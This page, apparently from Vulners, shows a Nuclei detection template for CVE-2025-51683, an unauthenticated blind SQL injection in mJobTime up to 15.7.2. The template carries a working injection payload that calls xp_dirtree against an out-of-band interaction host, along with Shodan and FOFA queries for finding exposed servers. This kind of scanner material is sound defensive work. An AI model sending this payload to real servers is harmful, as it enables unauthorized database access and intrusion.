mJobTime <= 15.7.2 - Unauthenticated Blind SQL Injection to RCE
| Reporter | Title | Published | Views | Family All 20 |
|---|---|---|---|---|
| CVE-2025-51683 | 27 Jan 202618:49 | – | circl | |
| mJobtime 安全漏洞 | 1 Dec 202500:00 | – | cnnvd | |
| mJobtime 安全漏洞 | 1 Dec 202500:00 | – | cnnvd | |
| CVE-2025-51682 | 1 Dec 202500:00 | – | cve | |
| CVE-2025-51683 | 1 Dec 202500:00 | – | cve | |
| CVE-2025-51682 | 1 Dec 202500:00 | – | cvelist | |
| CVE-2025-51683 | 1 Dec 202500:00 | – | cvelist | |
| EUVD-2025-200092 | 1 Dec 202521:30 | – | euvd | |
| EUVD-2025-200093 | 1 Dec 202521:30 | – | euvd | |
| CVE-2025-51682 | 1 Dec 202520:15 | – | nvd |
10
id: CVE-2025-51683
info:
name: mJobTime <= 15.7.2 - Unauthenticated Blind SQL Injection to RCE
author: 0x_Akoko,pdteam
severity: critical
description: |
mJobtime v15.7.2 contains a sql injection caused by crafted POST request to /Default.aspx/update_profile_Server, letting unauthenticated attackers execute arbitrary SQL statements remotely, exploit requires no special privileges.
impact: |
Unauthenticated attackers can execute arbitrary SQL commands, potentially compromising the database and sensitive data.
remediation: |
Update to the latest version of mJobtime.
reference:
- https://labs.infoguard.ch/advisories/cve-2025-51682_cve-2025-51683_time_management_softare_sqli-rce/
- https://nvd.nist.gov/vuln/detail/CVE-2025-51683
- https://github.com/advisories/GHSA-gp72-w5fg-q33m
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2025-51683
cwe-id: CWE-89
metadata:
verified: true
max-request: 2
vendor: mjobtime
product: mjobtime
shodan-query: http.html:"mJobtime"
fofa-query: body="mJobtime"
tags: cve,cve2025,mjobtime,sqli,rce,unauth,oast
flow: http(1) && http(2)
http:
- raw:
- |
GET /Default.aspx HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains_any(tolower(body), "mjobtime")'
- 'contains_any(header, "ASP.NET", "Microsoft-IIS")'
condition: and
internal: true
extractors:
- type: regex
name: build_version
part: body
group: 1
regex:
- "BuildNumber\\s*=\\s*'([0-9.]+)'"
internal: true
- raw:
- |
@timeout: 30s
POST /Default.aspx/update_profile_Server HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json; charset=utf-8
X-Requested-With: XMLHttpRequest
{"UserID":"admin","TheSetting":"ONLINE_ONLY","Company":"1","TheValue":"true' EXEC master.sys.xp_dirtree '\\\\{{interactsh-url}}\\share',1,1--","Method":"update_profile()(scripts.js) --> offLineAuth()(js/Login.js)"}
matchers:
- type: dsl
dsl:
- 'contains_any(interactsh_protocol, "dns", "http")'
- 'contains_any(header, "application/json", "ASP.NET")'
condition: and
# digest: 4a0a00473045022100becde40135040d5c077abb676611b9c91c1d5a330ed48ac32c8f48a63b7aefee022058ee63e70ee39de969837116008217b34d2e789cd2866f8c495cd5f71d6b090e:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
01 Sep 2026 00:20Current
6.1Medium risk
Vulners AI Score6.1
CVSS 3.19.8
EPSS0.00439
SSVC